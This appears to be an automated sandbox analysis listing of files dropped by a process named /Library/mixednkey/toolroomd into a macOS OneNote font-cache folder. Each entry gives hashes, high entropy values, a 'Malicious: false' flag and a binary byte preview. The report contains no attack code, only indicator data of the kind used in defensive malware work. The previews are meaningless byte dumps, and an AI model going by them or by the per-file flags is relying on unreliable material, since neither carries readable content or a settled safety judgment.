..j....z.i..f...pCs9.T..kk..I...F..#....#....._..^..:+5y..X......'#.n.N.....z....SY.......D+f...+.5....F3.f=k...0w....&\.k.W..8....{>.8....0L...].F..m.s+b..S..h.@....8.,...j....j.dG.B.Qt.m...v...j..I6B....(...}.2h2.;....m-+.s].z...].qf4k.(.lTqM.Bxr.R_...J.8..$..L.....P....sO.G...T..J:..-+uM.5...?..-...R~T..?X.9.k. .B.".}.....w0,..N?^u....

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXSizeThreeSymRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2162
Entropy (8bit):	7.691940117695986
Encrypted:	false
SSDEEP:	48:kL5lU28wUWHIR9OLw3F/sLN/m8Q8RROpBGmNpq:k3UezS941LNu8Q8DOpBGmu
MD5:	67F80B063D566AA92B394E6F996A322F
SHA1:	E747B22B6F0E8BE1219F1F371B3E8C23F1C6FEFF
SHA-256:	32EEFB8DEF8744F5A7ECF297298673F0C1AEC81D29F879535BEA37F2E1458EA8
SHA-512:	A4E18EEF4B69F4287C64F20D0F90AF9B016AB4EE161F74A649F6F1EA2E536B28612BC6F20C8DD15D607EFB2FD2E5E3AAEF2F1B0519D2F6707F16F0F7D391AD5C
Malicious:	false
Preview:	.<.\|.....f.A.......^..+.....y<.).!...i .Y.a...Syp.o....h......z......3.I.Rpk.....4]......./../e.G.z.0J.p.i.h.!. ..P.B.#...K..H..Y.M2u{...~XV.7.A(.g...K}.&.^r..0.%...............Z...R.n.C..H...\.e8...\.....Quw..f...@..i.#Y'za.(V.._..pZ3.T .K.Kl......L.9.b..Q.............D..)....S. .Uf.U8.....G0...b..w...,...WBXq..k.n.N...Bt.B..Q....L.QYK...\|i<.PC......^....c..&3'..D.X.dE..s~B..>.Q.IXb...KV.yZ\....$.....u..9..x.....f].f.......n...,....6s.=0u.-.q\|F.V}B ..$........Cl.....eX.w..n......"x.?w..-.o...t...N.h~j.V...+...z...C_"7<.d.\|/b....#/.Or'1.....a.?...i...j..b.f..[..z._C}..E56H..c....q.}....l...]p."...r..nW....j......)....{..y=..P.6wq.Y.d....Z.1.5%..P.Y..w....bQV6.d..:}xYe^....pp.!::..SX..P.T.;U.._.Y..g..."........:#...~.m..).....h.I.j.._.$.w...#......zKA}...1..p.>.... .~.D.e...r..o.. T..2a..N.P.......... F......d.."..[F...w.W{4.8+9..{.:.....=.8NJ+.. ...8g..'.(..LP/.k.-r...Gj..-*s.kO......3Qh.v<.R....S9.K]..~.R2..jT..irQ?.\|....R.H.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXSizeTwoSymRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1914
Entropy (8bit):	7.638432747097227
Encrypted:	false
SSDEEP:	24:xqAOvYS8ZdA6n01loeIM/2sLxoKaFkFlmBtAL9VU6LjS5SWv7ucv8rsePc0m7:x74dV9/2sLdqBtS9W6HSgWv7HGNpq
MD5:	52B29AF776776831255D7FB3E6A9E0CA
SHA1:	B42844C899BD8B171C042F4BB168A42219320B8B
SHA-256:	B60F0C2238D6E0485DFEEC1AA94F857F157B2EF30E21233B2B890AF7F3446272
SHA-512:	C481489DC37D705260C1756D192FD083E62A8690412B84017C1B42EE1CD917FAF1F3BF6945866C731329D49C54621FAB9908A454E9FC78B64EBB40ABFE9C5113
Malicious:	false
Preview:	.<.\|.....f.A.....;HS<9<...1FZdU.x..Q.B.i .Y.a.......Q. 9.m.q_..w67..H...._.)C..H.D..?]{..s......lmI1W<..g........c.$~?1.X....(..dj...Y...33.RBRo...A....#.Sd.`<I.z.....7.....F..d'.rr.G...y...d...3.w.H%0A.G.6 ....Rp.\.u.e.X...B..LAE....?..,...#q.r0y1..i.r ...].i.o....../..:.&..I.CW....l./f(..1/u+tF..3-S.P..?.K[....A....8...e....V....Q.(.....c...............tm.......]d.OUY..(E/{.6.."V.:..i..k...$.=0[.....n..G...........&u5..4.'7.....A......s.s6.5...\|.....<@5...+.......0....:.K...SU5._:iA.......T@.O..w\|a.z[f./..{ ...:\....2+.....U.......9..........7<L.\..7.........q.!..8.^1...z.C..*xd..VxE.v...O.Z."<..%.]...C.Y.T.....+v....u{v.%..N.t"..v.a....0..:=o,%28.d..L.X.[...............[.D7...0V...g.{.......H.Ux.s'.N..a2$A.......nf....-....N....Q.:.:....fGH.dl7.....(..Y..R....n...3...MJIG.....I-HL.%^U......5:.dp==...].......\(3..9....?..\|.-...Mv...............=t'.........RY.i......0p.....~K.`...(:.e..?.%W..>w\|...UD.d8OX.g#y.tO..\|.. #B.....<.+....2.C+.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXVariantsRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1650
Entropy (8bit):	7.557067009022954
Encrypted:	false
SSDEEP:	24:YuNtPp1KMTSRhY/6txc/YD2+dUtqECHhbFPKc5stLRnLVGvpMiq+/qsePc0m7:Yu3p1tmDLxlTSqEsdKc5s5TMmi1/qNpq
MD5:	A1118ED9BA8F05324A3461E0FDB0D42B
SHA1:	A2DD159E2156CCCD4DDDB1421507E176D83CB772
SHA-256:	4A3C3E7F982F8B37CBD3FFF2CF49FCCB9D7EFF26655E68185507F1B8C0EF1A35
SHA-512:	B3A7518DD97A7271FB1CA6FFD33DC5ABA1551E51D74AAD7F754D303C1262B2D7147B2D379CD89A95138F76EA8B4413D0A6D58E359865F6745D3B028EAE9FC8DF
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.a.Y.y.uCg...y6sT<"uP.....w.2N...rm.U_[,..v...Y......&.8...................Z/.....Y".....@.E.....L..`...~....%..<....qP.#.........@..Q.:H..JeY....u...`..^..IK..;..H...v5.s..._.....J/j...O.....~../yPbG..E.4.W!#wC..+z.......\|.R.x....3......O..p.....;.xH.HJ~......{E..HY...qfw..=...Y.,.G...z=..........U...U...6...&....C=....irUS...B.. ..B.`j.......nc...#.[(C>....G.}S..<......6....&....@"9.Fg.:..c..WH.U.....T.8&{Vz....U..@.....k.w..f ......x....y.=.7=I.T..:...D:./..5......).-...t.)`Z..J.......\l..DI.........Z[.;Y...lY.........>.]...n.../E.v7.2c..p......[Hg.e.F......./...H..U.f.:..1.d.n.bd......8 ...f.z10.M...!..Qb....7@....m...`.;/..#...T.._.e.~162.".Osn.B...(.6......(..~n.....5...u.i.I.m)...#l....;[.J..X....c...}..4.x&.L.........)(....m....`..0..]Z.OJ;eB.w.+W.Q8..s...j..p..hz.w........m2......$........Y........-.2......QG.o[Nt...._.&c..m.(.......\|.]x.R.b.7........{..v...$.@....uO..T...]C....@.^'m.`..o

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STSongRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1210
Entropy (8bit):	7.353151169484684
Encrypted:	false
SSDEEP:	24:EkEI18PcAiX2U7ANsx7T3j7uBfjEK9ntXpQsePc0m7:E3IaPcABmMs9TXuxjEu4Npq
MD5:	44290AE3D959E675F40C1E7EADDE8B2C
SHA1:	CAB28E6745CB3C3870ECD9FBD4D0E090F98A265C
SHA-256:	062E371C24F4C8B0B11DF6837FC63DC908AE5ADC86B4FA2F77A2EEEEAA9310B9
SHA-512:	D3455274F9101B363D0314275B785489D1601805D09287D086F2396CACC8DC332E5C4C2FE7F205204ADA9969B098518FE430AB6D5FBCE81CDC0BAE9E6FB9260A
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.af..#......0\ ....n...?.W.%......Sw.\..H#c.Aa.......E._....y:.&.&J.....l.7.$A2.cT.g....(_....<'o$$.H.....\.e8....$&...'....v...>.C^..,.z.....L(....PC..D..7}p..n.R..nh..X...x....oc).gs.\|~)T.+.A. .......+'v.....(.U'..R.).$.e.........h.B.)....-.S...n.r..5..,.?...-....P..Q..........b..Zl...N.b.C....F.q.{...R..z..V..7......e..#%.......H..E9s....!,..\|..Orn....9xH....e.....P.0V.6\|F....:N....Ao5~..._..,..@2.S......bpf.=.Y..@...?x..p$....f...,........,0...5.k.`......x..]..(.F..}.A..=_.^.p.....R.%...?.~.Fo......E.."....<....w.....Cf..T"..J..28.6\|.C..ry...c.p.v...Y:....T...,..>h..E+%.~....^.....76K..0.......i7NS.to.@Yn....B...kW.K....E.)....X...>..>.Bo.8$.!.1t...E}<..c.X..qF....#.......u.'r..D.8.:..&.A.e$.]...bi.8F...a..n......@q.._7.s.D.)9T.A.J.=.z..T..<..6>.(...r.=..n.h.$.H.....c..2..71s.@.cAvg...X..^..T..>...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.SathuRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1106
Entropy (8bit):	7.276962478141317
Encrypted:	false
SSDEEP:	24:EccEkhIRsqcRwnuWyWf3XsXQafBtg60WsePc0m7:E8xByS8/g6vNpq
MD5:	924492E21774A8F792A7E12F3E85BE5D
SHA1:	43A42C57DC61499299921F86F2874DE14B5CCB37
SHA-256:	2420C2893DBE3CEFB250FE343C0916EB59DDE5A9DF9ED6DF1ABD07232D785BFD
SHA-512:	86D9439153E80D9E280757347911A193D4F4971BD54C5962724D90BCADBC4F67B22898C4F12D6FE26EEB12DE3157DD3306518711A5E48CEF7B589FC3461A30D4
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..G"..i.Q.rT].?9..I.7.#d..jr..bl..lcb(L.....~..[?@.._....?.........87.qg....9.\|......g.B..lb.........Z...R.n.C8D....N....{d.,.&l..sil...BO.H...k>.v,L."....].i....fs ..}.s........r.d"..-....d>!6...<...'C....}.i.1.O.c9FE...O.d......'"$z...C..m..=`X.#.~.b..A~..k.C..D...e.Zr.Y.K.}......... .=.Z.lV]t...1F..;.\|.-.FC.....4..C.z..W......N{.}B.t[.,..e8.#4..1...6.....A...e._.....u5.i..Q......G ./.UrgJ5W.3..l.<5.........H.X..\.n...!Od........N.M...."..]...........7...3R.<..x M....7P.....%...x:.(D.r..r...M..\|..g..M{..H.(WX...)\|g.K.>....6..#..E.Q.i......._$..Ak...n.......>.L1......._...S..~2..X.a?(.x.....(..IsF.ZHx.j..C..5.x.X..6...[....JJPg..':W.t/./H.m.j.=..T:.4.B.b.K}.&.^r.5z(............4.M...q...".!.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Savoye LET PlainRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	7.578581667604848
Encrypted:	false
SSDEEP:	24:E2AE4QcKlQaneX+2DoSSf9YA2zA2is72lLpfusBnBwbqcJxUOusePc0m7:EKc+2sSsI72lLp2sBfcJ3uNpq
MD5:	0AB32480A54107EA6B2969EC2F648BDC
SHA1:	CA3A1F3AB2996C5718F60546D0B9A1F6D55CC41F
SHA-256:	699B7335AAE9E20A5ABEDD61581499E256E4CC43BAB8B43A7991968DEAB8D023
SHA-512:	EC2EEF90D0E6ECAA17E3148FF53BB666FA4CC3B1435189C126B880A42CD9B4A18A0642327C40593FF1D814B9106A8B7FFCF2C4E23C576D5958DA5A4BB855E630
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..a+..I.....2.g..@..B.0'...J.x:..k5].&...E...6y...=......_..~.+.F...B..f....wO.....@...+.k.2..n....w.C.P.nl.\|R...JLH..0..........sM..^!..2N..S...gp..)....M.%.$.f.7B....u.@.........l...... Kvx.....\b%.h.kY.}......t.a......]cB5.......r.....X..b....e....T{..R.,..u-.y..@J.......C./Pu..wV.^..q.t,.\p..v..r...~..3"J...I&.B[M..u.p6..16...l..S{e(.K.`...:"."s.k..?7...sq.$--m.U.x.z!.....13]. ux.8.[...9,..........K.._..C._.I....eV.T.U..:.Lk^..$..G.Z.'.-....R.rm.Q....b.~.......-.Q.".7P..h...o:...}...%...~..5g4...\| ...).{7...~z.2,b.;.C.b.j.."W.G,. .W..J..uu...u.D.3..TW.)0..N.^...d.$.K`......M9...=.^..T.k...X..K.t\|~rr..#&.*..j..a<...#2<....IW.....G.e_c6.3,..&.Q..9's.......b.f..>.'..+.h:.............r.k..{.g..n..z:w..;....;^W..'.a.g...j....w^m.........S...H\/..Z..f.>....t.%g.g.'a:...b...=6..=.!.....Cg...q.r.t.K.Q<.]=".....nh...p.j!..]`.>;D.sQ...kd...~/`.....y..=....C.]...3l..b..]?..:...<=,.U4......`...[n...I.Y

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Segoe UI HistoricRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1882
Entropy (8bit):	7.630295701388876
Encrypted:	false
SSDEEP:	48:E7/3vMnKJ4sqBPXZYovNw6wpRZN+5i8uqamOGj3t3Npq:eMKJxsJYD6wpc5prOSt3u
MD5:	442871DC749E4FBBB9549E43B0D3CC9D
SHA1:	B6AD034F2B98DBC99985C80198B2E9E45652D03F
SHA-256:	B619131E8447B12E3605E979DD39DB2BC07A0822293C06654FDC32362A0C01C6
SHA-512:	8C11520370D25DDBC67B8D543C7E2C3AC15D12721868F38A64296C2F352956691D7BDF28181A2E6A87BA5C50ADEC14E8AB47EE0AEFEE16DFF1EF07CD201DE796
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a9......;..........@.$R.p..'..../...?E7...]x....K......\|QL..."@\...;..:....=...=O...>.A.c.+...h..y..{\|..!..4w...2...S.^.2...S.^.2...S.^..&.X.....vp.=..H.....fl.....).6.)7.]9S.).....1..{!.......X...#}.!.....]s....6..>......q\.]<........;.B.zc...3+.N.<...s.....z-..J...`...e.....}...r.HP...e....og.....};...M.....C.w..;...;....C...f:NuU..{.{.F.~s....f..a...].0.u.g..\|.`S......K.9.U.l'.Eo...Q5.f.q]....8.3C.i...nV+`....XI.....4.....4.:.L..f.Ap.....'.u..>......"..r.1l.^Q..,..a...B........9H.b.cg..@.ys.#k.d..t(..t.P.h...s.c.7....*.P..Y..Hs)...7.c...7.%......Oe.-..H..[..V:....zs.z....R..}.2X...]&..b..._..8....B.'.q..Ae..'.2..il..L#.x6I..rs.lA......co.+.6...F.5....j.)Dr...f.....7....(.5...z.R..s.F.U.u.{j...?.K.S..Z!..&E...!..?.....X.P...V.../:A...9..c...q4..L.>..F.=....On..>..@..8...x.l......W..kS...SK..J/y.........0..f<5.\|...[....e...`K..@...0.. ...>'..Z6..rtc X...~...s+lu...i...&?....!..q....(...T..E..".

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Segoe UI SymbolRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1946
Entropy (8bit):	7.6601593794432805
Encrypted:	false
SSDEEP:	48:EO6wboQ8ntmIuwMYVuu6dHTE0WHGI1RACgD4cNpq:Aw4tmRwStTE0WHGI1Au
MD5:	19966F275CFB66D9195AEE48ADE8B29A
SHA1:	0F9819421CF34C04E0D2996384408B7FED839AF4
SHA-256:	91E12D5CD85EA91373289D76DF9B549BC9E2DA717F5FDF7C8FF62FB8E3280DE0
SHA-512:	648AD6EDB0E589A07DF61182B8EBFC3234C39D296E81054E4449FE260E92985C9143E0295379B91BEDF9D04C1AF82B072FED775981FD35C03C29E6538CB44A00
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a8q.5..O'.\GW....>Y.....d.......%_CT..c...]..%.A..@..V/.._n...H..H.../t./4d...Q..i...@...$........G%S2.o]i,.\|.$o]i,.\|.$o]i,.\|.$.. d........P......K.rG.L....b................~9....\../.~..1...x..aY.16...Wa.(%y.z...@..p\4..).....5.^NL.X...$.<8.Xs(...4.\..;.a$q.....R,[(..g2.....].7.m?.`.<....Qh.>..,if..7.o.1?.)L .w..e...E.....m.q..N.R.o.......qF\|.H...~H...h..?...!...-..8.R`.g....G....c.........Kw....x.R.3J4.e<i.`.:..p.......i..d\|..3.BA....*xI!Z..&.OPQ..9......?..A..J...x>G........ADg.s.B;.CW..H..b.k.]j...C.p.;.A.B.").$..:6L...;i%=K.8.n.].ja,.W:..T..vQZ&...7..3..WQ!....1.[L../i.c..3.-'...+.#`cR....,!S.Y.TC.N.,.....-......:..)...o.tq8.b...6.^M.4..\.......+~.W...z.......d.:zY.W..J5\|.]...(.e4.=....?topR.T5.vp.C.......W)..p.. .....:.J?..P..n.q...kK.X...t2Y@w.{.M.+j....4.!_w.......\|.e.D..a..8.s.Z:..O........x.+..~=b.uP.t..~....B.[..9#.J..k..W...t..e.g..L.G..2.]:.x....Q....".(......3..8A)g..Y..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.SeravekRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1266
Entropy (8bit):	7.3880338343548795
Encrypted:	false
SSDEEP:	24:EP99G8OGlEW3eh8nDmTOcRGrydfje3TXvi742ItMVbQ1vhsePc0m7:EPBn39nDm7YydfjeTXviHDohNpq
MD5:	8D3C5462244B8A36A45DD5F14DA96CEF
SHA1:	EB5A50AD32FEA1829DCF2A8F7E467026A0C77C8D
SHA-256:	C1FBD6942B795709F820C87D4A20CE37738D2DEBB08BED4E62EBD6C06073DC06
SHA-512:	5E45F89805754026EC0CC01C92E3D0CE8729FF5FAEAF1E0F86D0B301EBDCF52863B24461A7B4E88EB35C7D40534CA570C8AF8FE250616FBEE98317A1AC6AB78C
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aon5>.a...6.."vX.E......V.R...n>.H.......X...q.......6.......$....\|..(..cHf[..+.3a.......i.6\|.8.Q'\|aU...6.\.l.2....F.l_........508.? ..K'.'.X. .]i...'A`eq..`.W.u...Tq....!.....,_o..S.t....`.O.IDh....o./..v$.~..6i..q.?]..v.....>.Q.....N....1..3.......G..kG..z..y!.\G...H...\./j.E....,.pL...............~...VT.%T.........G...U.J....e).[0...jR..%.z.u.`.....mN$ ..d.....x..j.v.B~'/.a.C.<..A$....:...,,J...b......5`5.J\^^.._.O`..F.t...A..<(k@.^b.{..XF.w.=.G.'...d3.&.4%..)Tk"..\[..}k.Z......6.(..g...?..6.a.j?..tk.>.......N...![.....wO.... ..?.xP.O.U,.@.....MD[.}.}..0..{6..{..D....~.u.;.._F.pk.<..-..?.Z-.....47....={".%..0L}e..._v.w;DD.6:z.....c...\.u.(..]?rp..R5.:..... ....01.\xa.........pfF.,.6.Vv.....]..o&.li..q\..}@.z.p..'..G...t..L>f....F0...N...}w...L.?.DJ"...>..\|?b!....^[d)...5..kU......?=Es...P..l..9.=.W.0MC[..Hi....[F~...us....$.8TKs.c..a$......S..._.I.'.s....................\.........^./k..`R..V

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Shree Devanagari 714Regular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1930
Entropy (8bit):	7.65754806218827
Encrypted:	false
SSDEEP:	24:9AFA9oaAVh1LHmNNHcP+eW04i8Q8vDeIP/OvHmIOWTgP1VAsal7C/HVSsePc0m7:9n6VhNHYN8jj9xql9VBalycNpq
MD5:	287FC0F1D4CEAAA4EEC028181F0C7BB8
SHA1:	31F0A306AB65F8D48A904C5651BD72DE7BCEC1A7
SHA-256:	089322D822F2F2718711AB0DFDF9967EBCE9B6DB6E7FA630554B057803FB614E
SHA-512:	6BA8A262EC13EA14AB77BA2807F350CE6C5F194EB80F6E3220DCC7B355A6944273055CB675AE3E3E6AD8D481025ABDE9C839939026979A390F7236FCB00AAF5A
Malicious:	false
Preview:	.<.\|.....f.A..}.r<.9.%...D.fu.;..bcZ..i .Y.a/T.o....)......d...q...O.``.h..L...AFaN.8D.....m...=nDrX{.\|..j.JKeC..J....../l.2?.F..E..H.......}).t.<.....?..Tu.3C...Tu.3C...=............:.W.{m.!..T.7@....1._.p...F.n...oc7....-,.....g.7..'.9....tM....2@5......?/.r..d?.J.....f...........-...s.p..N.$.h./.]..JE...s..L...B,.J..."..}.......5.L...,4rh......sO..X...b.Y.:.a..1..).._.P.Z6...{..b.i<..p...W.~R.w./&.VO4......1...E....,.<.I[NW.v.b.x...3~Ee...#.?......\|.E.@.."i.c.......I.p\|.<......4@..E.....p.F]a.9&Yy.4rAw.AL...E.K....c..vy.n.....u....u.mxv....?". 2........[c..7hC...F...}....O.B...0(....T...MRN[T.L..?:.d.c...%&&.<.N[)G...q.~....o...4_.j./K.I6..\|...cA...Qb%U.<<..=.\....CH%......(?..&..x9....Ez..D.t.).8.Q'1...y.^s..6.......8...k............:`R.%.M.....h....y.........p..!..tS...2;.n.Qi..y.x...!...CX.V...R*.0.....cWG....-.....(...{[j.....u.4.4....W.Nq..LK..Y..l1.;...P..7.9..ehK$..f...../.E...[./......X..[....T.@+..x .....{k?.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.SignPainter HouseScriptRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2162
Entropy (8bit):	7.685257121581558
Encrypted:	false
SSDEEP:	48:EtswKAyBQkdHrdYNx6AztwW8+PuHOer9pSWpsJPo89Q4YNpq:ALqdKX65NNrJqPouYu
MD5:	14583A9D34432236076B00A0A842A5E6
SHA1:	9E366F22F52BF150BDD1BF146D94E0390C6E635A
SHA-256:	5934581C65D89292015965BF230F243433128EA90DC153AC8C652191888D1CC4
SHA-512:	EDD22EF1ECBC979EA80CBEDFD85C1633EA5E7D1DDB01F32E146CF2EF5FF32287426F09C2C24869CA5AE9839AAF68AAF1ED27B72C783EAF63E9A1EC4938B21499
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..=.R..).q.:A.....%......G..^j..9.p{N.....U...?4..1..)..n..\.-.....B"........a..6..k..5..s\|.v..Qc-H..u3.3..,.u3.3..,.u3.3..,.u3.3..,...>yY..L!'...f.XH...@...C.zh...J."....Wk..[p%..i.-.G....!..6...1o...{../......`..z.....n8...83...Uy....9.....i,.'..-_..S./T.C.i...X...S..{.X+X.@...LR........=K........v...BX.U.2...:..g....q.f......]w.#W5.R.DY~..;...=]}1+.P.P.../T.....c.......e=-e..........,...?..S.......M...N.8.....D.nN.E...^<._..;~....w.'?>.J.....O..n=w...V.....X.3......#!...d...O.&o..B....T..%...i.".h.q..C.....l#[....]&.}.0.]5....Q7...UF..z.!...2k..P.?..P..R.....D$.w..7+..g....G.t....2..(08Cn.u........sh.d......$.(..I...n.C..o;.TJ&..~.H .eb.-X...b..U...T....L.%.P&g...j..............b-..D..d.E....{.^I.$....P...%..f..........,.6..FR.C...P9.Y....j.(.m.....`v.A(p..+z.J!.Oe.... a`...EU.9Y....7.......L.......`/.1..u48..p.=(.8.w..<Hb...lh,..,Y.7(<`....FD..X].Dx.C.uY....<.0.K.../...M......1....7.\|..nVK....@...bdR69

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.SilomRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	7.059329803648145
Encrypted:	false
SSDEEP:	24:EahpN3f7nNiMGWRBSGgfo7NrGlsePc0m7:EG3f7gM6GgfllNpq
MD5:	79ED8AAF8E195B26202640E72F47F0B9
SHA1:	4BE9B62D435A85E23157AED91A3324248C88607C
SHA-256:	B5B7E68FAF114FBBE8B4E2EACB9B3065223E1F67AACEF82CC16B0987495E145E
SHA-512:	7AB62CE60B5D197E02AF031328FB8EB7B8FF8D610F034DFDBE5DAC2A77314EAFFD390CC427608C6C5D8F248895A9F6D40898012658F964A4F247920BB4AC66A7
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.ah..k.a.e...rV.[&.De(.D0M.Jz..y..?7......,..m..C....\|.n..p..{gn.iB.....c}...}.)..rn7.....l.F.C..z..@i.....d.S.......Fh0J.VTR....U...AE..j...d......p...o.;.yx.7.5kt\....k..6..s.`J.G.Fs.....I..+.I.Ig...c.N..U.e..\|Je....A.v8...K..Q...........z..H...$...Yr.;...co[........h.).!I..}...".:u.{0....i."..y .'".g...'....P..p......{.k@M/...}.0k.;.&....Q~..7.W..4SX......... ..?..B.".zTp^..s...K...S.7...\|..U....S.?..#v./.\.{8v.L_.}i..4Z..j...&.%rp.6IF.C0.....I q..N.%....U.!..x..X....... ..S.-.#...yY....3..OG..s..N[.Yb..........$..&&.....a.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.SimHeiRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1074
Entropy (8bit):	7.259668806391613
Encrypted:	false
SSDEEP:	24:E3nSFVG+r8v+orCCeO2WNwpg2W/VmsePc0m7:E3ai+orCfO2QYWtmNpq
MD5:	8B57361D3851023F38FF368A7963BB51
SHA1:	2F3A0F16638A5F70D5E686B1ED44E6504585BFF4
SHA-256:	02E8C72519ADE8E80F458037D6CF266961F121DCAC19E16AF8F227E5E1498980
SHA-512:	CD633DAA4ADA0A3A1F82525CC65E68D8AFF0A9C23DDD0840237357510628719D93646B1E06C411BF0F809C8E3DAC90C1F9AF68DB1487D5778D1F13D80198EC5C
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a......'.....8..J7..":.......>..Jj}.#@^..Y.n.(..hU....h`f.m`..k[d.C...=AYKB...9l.....l..E.-,...x1...H%0A.G.6 ....Rp.u>/.h.`.jW?..M90x.........S...W...H..."....1.(..C?.=......6.(...k.....^. .l/.QE.w.&.l)...l...{:....u.,y...p...9..>.u...)....!..,.;e?.".b..2,.B..l>.E.V.k.........y(L...[.M.Z.SY.!.f..-.3BV..!6...5~........j?F.G..........eX.SlI....s...)T..Pf....j..<.....6.yCR.<..Hc.N...1y!v.......o....N.....3/..m....B\.\|.).Z....9).ZY...}.I..V.@.+u.._...h..f........dd./sX.....jH.....DS..G.6..Q{.......&..;......-...O:.75[....`..#. .%.... .....0..t....w.-..d.......!...e....F..,.F.Y<9E..e.P..a....i.....-.x.....o...[...NZc...}"6n........H%0A.G.6 ....Rp.u>/.h.`.r8..8A....%.4....U..unX.[..z....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.SimSunRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.269402470295481
Encrypted:	false
SSDEEP:	24:EiTSnl2vywvJ2eMnoAuWIvYCWVu6A6gN8sBYoyM2dgsePc0m7:Edl2vyYFAuRAd1s8sBYofnNpq
MD5:	5926B475CED3049654D5F58630A2E1D6
SHA1:	4C00EE57308396415091771CD621DB4D76816DEE
SHA-256:	524DAC2EB1A732422AD2A99589700F53C1131084E72F9F3655994168752C4F93
SHA-512:	633A9E2827C3222FA23287EC8D821C69CD8B99F977B48B9FF7B9B2C79BBBD4DA34B1CAC47FC933AF1BB37EEB51CD9A974E321B67C323756C3C5000FD1FDA5513
Malicious:	false
